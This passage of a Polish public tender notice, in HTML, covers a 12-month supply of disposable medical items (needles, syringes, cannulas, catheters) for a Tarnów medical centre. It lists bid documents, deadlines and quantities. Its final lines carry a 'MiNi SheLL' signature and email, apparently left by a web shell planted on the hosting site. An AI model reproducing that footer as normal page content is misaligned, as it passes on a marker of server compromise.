4. Zaparafowany przez osoby upoważnione wzór umowy.
5. Wykonawca, wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 (Ustawy Prawo zamówień publicznych), albo informację o tym, że nie należy do grupy kapitałowej.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia i dokumenty, które Wykonawca zobowiązany jest dołączyć do oferty

1. Załącznik Nr 1 - Wypełniony i podpisany formularz ofertowy.
2. Załącznik Nr 2 - Oświadczenie.
3. Pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika.
4. Zaparafowany przez osoby upoważnione wzór umowy.
5. Wykonawca, wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 (Ustawy Prawo zamówień publicznych), albo informację o tym, że nie należy do grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany mogą dotyczyć zmiany terminu wykonania zamówienia oraz innych zmian nie powodujących zmian zawartej umowy co do treści złożonej oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:portal.mcm.tarnow.bip-gov.info.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mościckie Centrum Medyczne sp. z o.o.,33-101 Tranów, ul. Kwiatkowskiego 15, Sekretariat  p. 131 I p. w godz. 7.00-14.00 od poniedziałku do piątku
lub na pisemną prośbę za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2014 godzina 12:00, miejsce: Mościckie Centrum Medyczne sp. z o.o. 33 -101 Tranów, ul. Kwiatkowskiego 15, Sekretariat Zamawiającego  p. 131 I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTY JEDNORAZOWEGO UŻYTKU DLA MOŚCICKIEGO CENTRUM MEDYCZNEGO SPÓŁKA Z OGRANICZONA ODPOWIEDZIALNOŚCIĄ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna dostawa materiałów i sprzętu jednorazowego użytku dla Mościckiego Centrum Medycznego Spółka z ograniczoną odpowiedzialnością w Tarnowie.
2.	Sukcesywne zamawianie towaru określające ilość i asortyment odbywać się będzie telefonicznie lub faxem.
3.	Dostawy odbywać się będą w uzgodnionych ilościach i asortymencie w ciągu 5 dni roboczych licząc od daty zgłoszenia zamówienia na koszt i ryzyko Wykonawcy.
4.	Przyjęcie towaru następować będzie w magazynie Zamawiającego, po sprawdzeniu ilości i rodzaju dostarczonej asortymentu..

Pakiet nr 1
Lp.	NAZWA MATERIAŁU	J.M.	ILOŚĆ
1	IGŁA  0,5X25 A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	50
2	IGŁA 0,6X30  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	15
3	IGŁA 0,7X40  A100SZT. Terumo lub równoważne pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	100
4	IGŁA 0,7X 30 A 100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	op.	10
5	IGŁA O,8X40 A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	40
6	IGŁA 0,9X40  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	50
7	IGŁA1,1X40   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	5
8	IGŁA 0,5X16  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	5
9	IGŁA0,9X50   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	3
10	IGŁA 1,2X40   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	20
11	IGŁA DO WSTRZYKIWACZY INSULINOWYCH JAŁOWE 0,30X8MM pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	SZT.	2400
12	STRZYKAWKA  100ML JAŁOWA  NIEPIROGENNA do płukania uszu z łagodnym zakończeniem TYPU POLFA	SZT.	1260
13	STRZYKAWKA 2-CZĘŚCIOWA  2ML A 100SZT 
 -kontrastujący tłok
-rozszerzona skala min.20%
-pojedyncza skala pomiarowa	OP.	80
14	STRZYKAWKA 2-CZĘŚCIOWA  5ML A 100SZT  
-kontrastujący tłok 
-rozszerzona skala min.20%
-pojedyncza skala pomiarowa	OP.	70
15	STRZYKAWKA  2 CZĘŚCIOWA  10ML A 100SZT 
- kontrastujący tłok
-rozszerzona skala min.20%
-pojedyncza skala pomiarowa	OP.	20
16	STRZYKAWKA  2-CZĘŚCIOWA  20 ML.A 100SZ 
 -kontrastujący tłok 
-rozszerzona skala min.20%
-pojedyncza skala pomiarowa	OP.	25
17	STRZYKAWKA do pompy infuzyjnej NIE MNIEJ NIŻ 50ML. I NIE WIĘCEJ NIŻ 60 ML.	SZT.	10
18	FARTUCH FLIZOLINOWY 1X UŻYTKU a 10 szt	Op .	10
19	PRZEŚCIERADŁO FLIZELINOWE 1X UŻYTKU NIE MNIEJSZE NIŻ 210X140	SZT.	1800
20	MASECZKA 1XUŻYTKU FLIZELINOWA Z GUMKĄ	SZT.	1200
21	MOTYLKI 22G	SZT.	200
22	VENFLON 0,6 wykonany z poliuretanu, posiadający min. 3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	50
23	VENFLON 0,7 wykonany z poliuretanu, posiadający min. 3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	500
24	VENFLON 0,9 wykonany z poliuretanu, posiadający min.3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	800
25	VENFLON 1,1 wykonany z poliuretanu, posiadający min.3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu
	SZT.	500
26	VENFLON 1,3 wykonany z poliuretanu, posiadający min.3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	700
27	KORECZEK DO VENFLONU może posiadać trzpień zamykający światło kaniuli znajdujące się powyżej krawędzi koreczka.	SZT.	500
28	Zamknięty system dostępu naczyniowego bezigłowy, bez metalowych oraz wewnetrzynych mechanicznych części, bez lateksu, umożliwiający połączenia typu Luer zapewniający używanie do 7 dni.	Szt.	250
29	KRANIK TRÓJDROŻNY DO VENFLONU	SZT.	200
30	ZATYCZKA DO CEWNIKA TYPU FOLLEY UNIWERSALNA POSIADAJĄCA  UCHWYT UŁATWIAJĄCY  PRAWIDŁOWE UMIESZCZENIE GO W ODPOWIEDNIM MIEJCSU	SZT.	50
31	PRZEDŁUŻACZ DO POMPY INFUZYJNEJ NIE KRÓTSZY NIŻ 120 CM-JAŁOWY NIEPIROGENNY, NIETOKSYCZNY	SZT.	50
32	CEWNIK DO PODAWANIA TLENU PRZEZ NOS DLA DOROSŁYCH	SZT.	50
33	CEWNIK DO ODSYSANIA DLA DOROSŁYCH	SZT.	100
34	CEWNIK ZEWNĘTRZNY Urologiczny NR 25	SZT.	20
35	DREN DO MASKI TLENOWEJ	SZT.	10
36	KANKA DOODBYTNICZA DLA DOROS.NR 24	SZT.	100
37	ZGŁĘBNIK ŻOŁĄDKOWY DLA DOROS. CH 18 nie krótsze niż 800 mm	SZT.	120
38	ZGŁĘBNIK ŻOŁĄDKOWY DLA DOROS.CH 16	SZT.	20
39	CEWNIK TYPU FOLLEYA NR 06	SZT.	10
40	CEWNIK TYPU FOLLEYA NR 08	SZT.	10
41	CEWNIK TYPU FOLLEYA NR 10	SZT.	10
42	CEWNIK TYPU FOLLEYA NR 12	SZT.	10
43	CEWNIK TYPU FOLLEYA NR 16	SZT.	40
44	CEWNIK TYPU FOLLEYA NR 18	SZT.	50
45	CEWNIK TYPU FOLLEYA NR 20	SZT.	70
46	CEWNIK TYPU FOLLEYA NR 22	SZT.	30
47	CEWNIK TYPU FOLLEYA NR 24	SZT.	20
48	CEWNIK TYPU FOLLEYA NR 26	SZT.	50
49	CEWNIK TYPU FOLLEYA NR 30	SZT.	20
50	KAPTUREK JEDNORAZOWY PLASTIKOWY DO TERMOMETRU Brown a 40 szt.	Op.	40
51	WOREK UROLOGICZNY 2L. jałowy	SZT.	500
52	WOREK UROLOGICZNY 750 ML. jałowy	SZT.	10
53	KIELISZKI JEDNORAZOWE NA LEKI a 75 szt.	OP.	150
54	Wziernik do otoskopu Heine Mini 3000-jednorazowy plastikowy o 4 mm	SZT.	1000
55	Wziernik do otoskopu Heine Mini 3000-jednorazowy plastikowy o 2,5 mm	SZT.	1000
56	PASKI DO STER.PARĄ WODNĄ DO PAKIETU NIE GORSZE NIŻ STEAM A 250SZT.	OP.	10
57	TAŚMA DO STER.PARĄ WODNĄ NA PAKIET a 1szt.	OP.	4
58	TOREB.PAPIER.FOLIA SAMOP.90x230a100szt.	OP.	10
59	TOREB.PAPIER.FOLIA SAMOP. 90x203a100szt.	OP.	10
60	TOREB.PAPIER.FOLIA SAMOP.130x250 a100szt.	OP.	10
61	TOREB.PAPIER.FOLIA SAMOP.90x130 a100szt.	OP.	10
62	SZPATUŁKI  DO JĘZYKA drewniane A 100SZT.	OP.	80
63	PENSETY JEDNORAZ. jałowa	SZT.	200
64	KUBKI NA MOCZ JAŁOWE nie mniej niż 100ML.Z ZAKRETKĄ	SZT.	250
65	APARAT DO KROPÓWKI posiadające komorę wolną od PCV oraz pozbawione ftalanów	SZT.	1600
66	SCALPEL JAŁOWY OSTRZE + UCHWYT NR 11	SZT.	100
67	SCALPEL JAŁOWY OSTRZE + UCHWYT NR 12	SZT.	100
68	SCALPEL JAŁOWY OSTRZE + UCHWYT NR 13	SZT	100
69	OSTRZA STERYLNE WYMIENNE NR. 24 nie wymagany grawer z nazwą producenta na ostrzu 	OP.	1
70	OSTRZA STERYLNE WYMIENNE NR. 13 nie wymagany grawer z nazwą producenta na ostrzu	OP.	1
71	OSTRZA STERYLNE WYMIENNE NR. 23 nie wymagany grawer z nazwą producenta na ostrzu	OP.	1
72	OSTRZA STERYLNE WYMIENNE NR. 12 Z ZAKRZWIONYM OSTRZEM nie wymagany grawer z nazwą producenta na ostrzu	OP.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com